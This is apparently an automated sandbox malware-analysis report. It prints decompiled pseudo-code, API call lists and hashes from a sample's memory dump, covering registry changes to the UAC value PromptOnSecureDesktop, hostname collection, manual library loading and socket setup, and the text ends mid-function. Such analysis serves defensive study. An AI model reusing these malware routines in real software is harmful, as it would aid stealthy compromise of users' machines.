RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161

Strings

PromptOnSecureDesktop, xrefs: 0040E0D3

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Value$CloseCreateDelete
String ID: PromptOnSecureDesktop
API String ID: 2667537340-2980165447
Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD08, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}

0x0040ad1c
0x0040ad24
0x0040ad71
0x0040ad74
0x0040ad77
0x0040ad88
0x0040ad88
0x00000000
0x0040ad7f
0x0040ad26
0x0040ad29
0x0040ad2c
0x0040ad2f
0x0040ad55
0x0040ad35
0x0040ad3d
0x0040ad45
0x0040ad4d
0x00000000
0x00000000
0x0040ad4d
0x0040ad45
0x00000000
0x0040ad4f
0x0040ad4f
0x0040ad4f
0x0040ad51
0x0040ad52
0x0040ad52
0x0040ad53
0x00000000
0x0040ad53
0x0040ad35
0x0040ad60
0x0040ad66
0x0040ad69
0x0040ad6b
0x0040ad6b
0x00000000

APIs

gethostname.WS2_32(?,00000080), ref: 0040AD1C
lstrlenA.KERNEL32(00000000), ref: 0040AD60
lstrlenA.KERNEL32(00000000), ref: 0040AD69
lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F

Strings

LocalHost, xrefs: 0040AD79

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: lstrlen$gethostnamelstrcpy
String ID: LocalHost
API String ID: 3695455745-3154191806
Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 7.6, APIs: 5, Instructions: 121
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}

0x00406071
0x00406074
0x0040607c
0x0040607c
0x00406082
0x00406087
0x00406099
0x0040609c
0x004060a2
0x004060a4
0x004061b2
0x00000000
0x004061b5
0x004060aa
0x004060ad
0x004060b5
0x004060b5
0x004060b8
0x004060ba
0x00000000
0x00000000
0x004060c3
0x004060c9
0x004060cc
0x004060cf
0x004061ae
0x004061ae
0x004061ae
0x004061ae
0x00000000
0x004061ae
0x004060d5
0x004060d5
0x004060d8
0x004060da
0x004060ee
0x004060fa
0x004060dc
0x004060dc
0x004060e7
0x004060e7
0x00406101
0x00406104
0x00406106
0x00000000
0x0040610c
0x0040610c
0x00406112
0x00406115
0x00406118
0x0040611b
0x0040611d
0x0040612d
0x0040612d
0x0040612f
0x0040611f
0x0040611f
0x00406127
0x00406127
0x00406131
0x00406133
0x00406135
0x0040618b
0x0040618b
0x0040618f
0x00000000
0x00000000
0x00406191
0x0040619e
0x004061a4
0x004061a6
0x004060b2
0x00000000
0x004060b2
0x00000000
0x00406137
0x00406137
0x0040613a
0x0040613d
0x0040613f
0x0040613f
0x0040615e
0x00406164
0x00406166
0x00406173
0x00406173
0x00406176
0x0040617a
0x00406187
0x00406187
0x00406187
0x00000000
0x00406187
0x00000000
0x0040617a
0x00406168
0x0040616b
0x0040616e
0x00000000
0x00000000
0x00406170
0x00406170
0x00000000
0x00406170
0x0040614a
0x00406150
0x00000000
0x0040617c
0x0040617c
0x0040617f
0x00406181
0x00406181
0x00000000
0x00406185
0x00406135
0x00406106
0x00000000
0x004060b5
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Read$AddressLibraryLoadProc
String ID:
API String ID: 2438460464-0
Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00402923, Relevance: 7.6, APIs: 5, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0040EE2A(_t76, _t80, 0, 0x124);
							E0040EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}

0x00402923
0x00402931
0x00402932
0x00402935
0x0040293b
0x00402950
0x00402957
0x0040296a
0x0040296e
0x00402970
0x00402973
0x00402978
0x00402a5b
0x00402a5b
0x00402a5e
0x00000000
0x00402a5e
0x0040297e
0x00402995
0x004029ac
0x004029ae
0x004029b1
0x004029b7
0x00000000
0x00000000
0x004029c1
0x004029ca
0x004029d6
0x004029e0
0x004029e2
0x004029e6
0x004029ee
0x004029f4
0x00000000
0x00000000
0x00402a0a
0x00402a0e
0x00000000
0x00000000
0x00402a18
0x00402a2a
0x00402a33
0x00402a36
0x00402a38
0x00402a3b
0x00402a3e
0x00402a43
0x00402a4a
0x00402a45
0x00402a45
0x00402a45
0x00402a4c
0x00402a55
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a55
0x00000000
0x0040297e
0x00402959
0x00000000
0x00402959
0x00000000

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040E654, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0040DD05();
				_t41 = 0x4120e8;
				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
				if(_t55 == 0) {
					L9:
					_t53 = E0040EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00403E8F(0x4120e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x4120e4;
						__eflags =  *0x4120e4 - _t42; // 0x4120e4
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0040DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t34 = lstrcmpA(_t51 + 0x10, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x4120e4;
						} while ( *_t42 != 0x4120e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x73b743e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x4120e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}

0x0040e65a
0x0040e664
0x0040e666
0x0040e66c
0x0040e6a9
0x0040e6b0
0x0040e6b5
0x0040e6c8
0x0040e6d0
0x0040e6d3
0x0040e6d8
0x0040e6de
0x0040e6f5
0x0040e6e0
0x0040e6e5
0x0040e6e9
0x0040e6ef
0x0040e6ef
0x0040e6f9
0x0040e6f9
0x0040e6fe
0x0040e704
0x0040e741
0x0040e743
0x0040e6b9
0x0040e6b9
0x0040e6c4
0x00000000
0x00000000
0x00000000
0x0040e706
0x0040e706
0x0040e706
0x0040e709
0x0040e70b
0x0040e70e
0x0040e715
0x0040e715
0x0040e715
0x0040e718
0x0040e71b
0x0040e72c
0x0040e72c
0x0040e72c
0x0040e732
0x00000000
0x0040e736
0x0040e722
0x0040e728
0x0040e72a
0x00000000
0x00000000
0x00000000
0x0040e72a
0x0040e710
0x0040e713
0x00000000
0x00000000
0x00000000
0x0040e737
0x0040e737
0x0040e739
0x0040e739
0x00000000
0x0040e706
0x0040e6b7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e66e
0x0040e66e
0x0040e66e
0x0040e676
0x0040e684
0x0040e68f
0x0040e699
0x0040e686
0x0040e686
0x0040e686
0x0040e69b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e69b
0x0040e69d
0x0040e69d
0x0040e69f
0x0040e6a1
0x0040e6a7
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

lstrcmpA.KERNEL32(73B743E8,00000000,?,73B743E0,00000000,?,00405EC1), ref: 0040E693
lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,73B743E0,00000000,?,00405EC1), ref: 0040E6E9
lstrcmpA.KERNEL32(?,00000008,?,73B743E0,00000000,?,00405EC1), ref: 0040E722

Strings

A, xrefs: 0040E6F9, 0040E6FE, 0040E739
A, xrefs: 0040E65F, 0040E666, 0040E6CF, 0040E731

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
String ID: A$ A
API String ID: 3343386518-686259309
Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F26D, Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402419, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}

0x00402429
0x0040242b
0x0040242e
0x00402434
0x00402436
0x0040243b
0x00402474
0x00402474
0x0040243d
0x0040243d
0x00402440
0x00402442
0x00402446
0x0040244c
0x00000000
0x00000000
0x0040246b
0x00402472
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402472
0x0040247b
0x0040247b
0x00402476
0x0040247a

APIs

lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467

Strings

localcfg, xrefs: 0040241F

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcmpi
String ID: localcfg
API String ID: 1808961391-1857712256
Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E52E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040E52E(void* __edx, void* __eflags) {
				long _v4;
				void* __ecx;
				void* _t9;
				void* _t11;
				void* _t17;
				long _t20;
				void* _t23;
				int _t24;
				void* _t28;
				void* _t32;
				void* _t37;
				void* _t40;
				void* _t44;

				_t44 = __eflags;
				_t32 = __edx;
				E0040DD05();
				_t28 = E0040DBCF(_t44, 0x80000000, 3);
				_pop(_t31);
				if(_t28 == 0xffffffff) {
					L6:
					_t9 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
					_t11 = E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t9);
					_t40 = _t37 + 0x34;
					if(_t11 == 0) {
						_t17 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t17);
						_t40 = _t40 + 0x34;
					}
					E0040EE2A(_t31, 0x4122f8, 0, 0x100);
					E0040EE2A(_t31, 0x4128f8, 0, 0x100);
					E0040DD69();
					return 1;
				}
				_t20 = GetFileSize(_t28, 0);
				_v4 = _t20;
				if(_t20 != 0) {
					E0040DB2E(_t20);
					_t23 =  *0x4136c4;
					_pop(_t31);
					if(_t23 != 0) {
						_t31 =  &_v4;
						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
						_t48 = _t24;
						if(_t24 != 0) {
							E00402544( *0x4136c4,  *0x4136c4, _v4, 0xe4, 0xc8);
							E0040E332(_t32, _t48,  *0x4136c4, _v4);
							_t37 = _t37 + 0x1c;
						}
					}
				}
				CloseHandle(_t28);
				goto L6;
			}

0x0040e52e
0x0040e52e
0x0040e533
0x0040e544
0x0040e54c
0x0040e553
0x0040e5b8
0x0040e5c7
0x0040e5ed
0x0040e5f2
0x0040e5f7
0x0040e603
0x0040e624
0x0040e629
0x0040e629
0x0040e635
0x0040e63e
0x0040e646
0x0040e653
0x0040e653
0x0040e558
0x0040e55e
0x0040e564
0x0040e567
0x0040e56c
0x0040e571
0x0040e574
0x0040e578
0x0040e583
0x0040e589
0x0040e58b
0x0040e59a
0x0040e5a9
0x0040e5ae
0x0040e5ae
0x0040e58b
0x0040e574
0x0040e5b2
0x00000000

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

GetFileSize.KERNEL32(00000000,00000000,?,73B743E0,?,00000000,?,0040A445), ref: 0040E558
ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,73B743E0,?,00000000,?,0040A445), ref: 0040E583
CloseHandle.KERNEL32(00000000,?,73B743E0,?,00000000,?,0040A445), ref: 0040E5B2

Strings

PromptOnSecureDesktop, xrefs: 0040E5D9, 0040E5DE, 0040E615, 0040E634

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
String ID: PromptOnSecureDesktop
API String ID: 3683885500-2980165447
Opcode ID: ea61079883e1d137724bdb03d89989e3cb326a6ab799ec698869bd57d3053e24
Instruction ID: 336cca8f28a0ae06816d6806ca3c094c6326420f96deeb8fe64773c8e7208e17
Opcode Fuzzy Hash: ea61079883e1d137724bdb03d89989e3cb326a6ab799ec698869bd57d3053e24
Instruction Fuzzy Hash: F321EAB19402047AE2207B639C0AFAB3D1CDF54758F10093EBA09B11E3E9BDD96082BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
